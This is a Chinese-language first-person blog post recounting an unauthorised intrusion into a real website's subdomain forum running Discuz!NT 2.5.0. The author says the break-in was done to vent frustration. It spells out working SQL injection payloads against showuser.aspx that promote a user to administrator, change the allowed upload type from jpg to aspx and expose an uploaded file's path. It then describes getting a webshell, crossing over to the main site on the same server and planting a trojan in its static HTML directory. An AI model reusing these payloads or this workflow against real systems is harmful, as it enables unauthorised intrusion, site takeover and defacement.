|
从上个星期起就开始入侵检测这个网站了,当时是一点办法都没有,虽说存在一些漏洞,但是都没有太大的利用价值。尝试入侵了一下服务器上的其他站,用的是独立服务器,上面都是主站的一些分站。经检查也都没啥搞头。 因为事情比较多,就把它扔到记事本里放了一个星期。昨天早上起来感觉心情很不爽,我也不知道是为啥,很是郁闷。于是又把它翻了出来,决定一定要发泄一番。 我知道主站是绝对没得搞的,于是重新查了一下服务器上都有哪些站。查到服务器上又多了一个分站hr.xxx.com,看到这个域名,我还以为是人力资源部的呢(可能前几次人力资源部面试面出阴影了吧)。打开一看是个BBS,一个帖子都没有,注册会员30来个,再看一下程序是用的Discuz!NT2.5.0。眼前一亮,这套程序中的showuser.aspx文件不是有注入漏洞么! 但愿没有打补丁吧。先说说现在的思路吧。 1.注册个会员。 2.利用漏洞构造SQL将会员提升为管理员。 3.登陆后台更改上传附件文件类型。 4.前台传马,后台查看文件路径,得到WEBSHELL。 提交SQL提升boygood为管理员 Sql 代码复制代码 showuser.aspx?ordertype=desc;update dnt_users set adminid=’1’,groupid=’1’ where username=’boygood’;-- showuser.aspx?ordertype=desc;update dnt_users set adminid=’1’,groupid=’1’ where username=’boygood’;-- 提交完后退出并重新登陆,这时boygood显示的已经是管理员了,O(∩_∩)O哈哈~
点击“系统设置”进入后台登陆界面。本来想着已经成功了呢,可是无论如何我都登陆不进去,本来就很郁闷,现在更郁闷了。
接下来就是依据该数据字典构造SQL了,首先构造修改上传文件类型的SQL。 Sql 代码复制代码 showuser.aspx?ordertype=desc;update dnt_attachtypes set extension=’aspx’ where extension=’jpg’;-- showuser.aspx?ordertype=desc;update dnt_attachtypes set extension=’aspx’ where extension=’jpg’;-- 将原来的jpg类型改为了aspx类型,现在可以上传aspx马了。
showuser.aspx?ordertype=desc;update dnt_userfields set website=(select filename from dnt_attachments where dnt_attachments.aid=1) where uid=2995;-- showuser.aspx?ordertype=desc;update dnt_userfields set website=(select filename from dnt_attachments where dnt_attachments.aid=1) where uid=2995;-- 好了,结合用户信息表和附件表已经把我刚才传的附件路径赋值给我的个人网站了,现在浏览一下我的个人信息。 嘿嘿...马儿的位置出现了,至此拿到了当前站的WEBSHELL了。
进到WEBSHELL查看了一下当前的权限和环境,还是比较严的。现在的想法就是,找到目标站的路径,试试看能否跨过去。这个论坛不是用的SQL Server吗,我再构造一个注入点,然后拿个工具去把目录列出来不就可以了。至于如何构造,可参见[构造注入] 一文。 目录有了,也跨过去了,看了目录结构及其命名,原来主站的核心是风讯CMS,可是却没有写权限。- -!貌似人家把不经常改变的目录及文件的写权限都去了。再想,他要发布信息,而且生成纯静态页面,那么存放这些静态页面的目录应该可写吧,打眼一看,就知道那个HTML目录是存放静态页面的,当然也成功的向该目录下写了个马。
|
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
